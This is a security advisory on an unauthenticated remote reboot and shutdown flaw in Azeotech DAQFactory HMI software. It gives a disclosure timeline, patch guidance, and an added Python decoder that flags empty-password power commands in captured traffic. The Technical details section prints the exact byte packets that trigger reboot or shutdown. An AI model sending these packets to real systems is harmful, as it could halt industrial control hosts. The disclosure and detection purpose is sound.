nSense Vulnerability Research Security Advisory NSENSE-2011-004
---------------------------------------------------------------

Affected Vendor:  Azeotech
Affected Product: DAQFactory
Platform:         Windows
Impact:           Remote reboot/shutdown
Vendor response:  Patch
CVE:              None
Credit:           Knud / nSense

Technical details
---------------------------------------------------------------

In the default configuration the HMI accepts network connections without
authentication. An attacker with network access to the HMI host can
therefore reboot or shut down the machine running the HMI software by
sending the following messages over such a connection:

  preamble: "\x01\x00\x09\x00CPassword\x00"
  reboot:   "\x01\x00\x0f\x00CCommandGeneric\x01\x00\x00\x00\x04\x00\x00\x00"
  shutdown: "\x01\x00\x0f\x00CCommandGeneric\x01\x00\x00\x00\x06\x00\x00\x00"

The preamble is a CPassword message carrying an empty password. Each of
the two commands is a CCommandGeneric message whose final four bytes
select the action: 0x04 for reboot, 0x06 for shutdown.

Timeline:
20110412 Contacted ICS-CERT
20110413 ICS-CERT acknowledges receipt of information
20110413 ICS-CERT creates ticket, # ICS-VU-240775
20110502 Vendor creates patch, releases advisory to customers
20110625 ICS-CERT releases advisory
20110727 Vendor responds, CVE assigned, patch
20110809

Solution
Install the latest version from the vendor:
http://www.azeotech.com/downloads.php
Until the update is applied, restrict network access to the HMI host so
that only trusted operator stations can reach it.

Links:
http://www.nsense.fi
http://www.nsense.dk

Driven by the challenge_
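The three byte strings in the Technical details section share one framing: two header bytes (0x01 0x00), a 16-bit little-endian length, an ASCII class name of that length, then a class-specific body. The decoder below, an added example and not nSense or Azeotech code, splits a captured stream into those messages and flags the unauthenticated reboot/shutdown commands, which is the check a network-monitoring rule for this issue needs. The layout is inferred from the published packets only: reading the CCommandGeneric body as two 32-bit little-endian integers, treating 4 and 6 as the reboot and shutdown ids, and treating an empty CPassword string as the "no authentication" preamble are assumptions drawn from the advisory, not from vendor documentation.

```python
"""Decode the DAQFactory message framing seen in NSENSE-2011-004 and flag
reboot/shutdown commands sent after an empty CPassword.

Added example; framing and field meanings are inferred from the three
published packets, not from vendor documentation.
"""
import struct
from typing import Iterator, List, NamedTuple

# The three packets exactly as published in the advisory.
PREAMBLE = b"\x01\x00\x09\x00CPassword\x00"
REBOOT = b"\x01\x00\x0f\x00CCommandGeneric\x01\x00\x00\x00\x04\x00\x00\x00"
SHUTDOWN = b"\x01\x00\x0f\x00CCommandGeneric\x01\x00\x00\x00\x06\x00\x00\x00"

# Command ids as labelled in the advisory (assumed meaning).
COMMAND_NAMES = {4: "reboot", 6: "shutdown"}


class Message(NamedTuple):
    cls: str    # class name carried in the frame, e.g. "CPassword"
    body: bytes  # class-specific payload that follows the name


def parse_messages(data: bytes) -> Iterator[Message]:
    """Split a byte stream into (class name, body) messages.

    CPassword bodies are NUL-terminated strings; CCommandGeneric bodies are
    eight bytes.  Any other class stops decoding with an error because the
    advisory gives no way to know its body length.
    """
    off = 0
    while off + 4 <= len(data):
        hdr, name_len = struct.unpack_from("<HH", data, off)
        if hdr != 1:
            raise ValueError(f"unexpected header 0x{hdr:04x} at offset {off}")
        off += 4
        name = data[off:off + name_len].decode("ascii")
        off += name_len
        if name == "CPassword":
            end = data.index(b"\x00", off)
            body = data[off:end]
            off = end + 1
        elif name == "CCommandGeneric":
            body = data[off:off + 8]
            if len(body) != 8:
                raise ValueError("truncated CCommandGeneric body")
            off += 8
        else:
            raise ValueError(f"unknown class {name!r}; body length unknown")
        yield Message(name, body)


def describe(msg: Message) -> str:
    """Human-readable one-liner for a decoded message."""
    if msg.cls == "CPassword":
        return f"CPassword password={msg.body.decode('ascii', 'replace')!r}"
    flag, cmd = struct.unpack("<II", msg.body)  # assumed: two u32 LE fields
    return (f"CCommandGeneric flag={flag} cmd={cmd} "
            f"({COMMAND_NAMES.get(cmd, 'unknown')})")


def uses_empty_password(data: bytes) -> bool:
    """True if the stream authenticates with an empty CPassword."""
    return any(m.cls == "CPassword" and m.body == b""
               for m in parse_messages(data))


def find_power_commands(data: bytes) -> List[str]:
    """Names of reboot/shutdown commands present in the stream, in order."""
    found = []
    for m in parse_messages(data):
        if m.cls != "CCommandGeneric":
            continue
        _flag, cmd = struct.unpack("<II", m.body)
        if cmd in COMMAND_NAMES:
            found.append(COMMAND_NAMES[cmd])
    return found


if __name__ == "__main__":
    # Constructed capture: the preamble followed by both commands.
    capture = PREAMBLE + REBOOT + SHUTDOWN
    for m in parse_messages(capture):
        print(describe(m))
    print("empty password:", uses_empty_password(capture))
    print("power commands:", find_power_commands(capture))
```

Feeding a captured TCP payload to `find_power_commands` together with `uses_empty_password` gives the two facts an alert needs: a reboot or shutdown command was issued, and it was issued with no password. The parser refuses to guess body lengths for classes the advisory does not show, so it raises on unknown frames rather than silently skipping them.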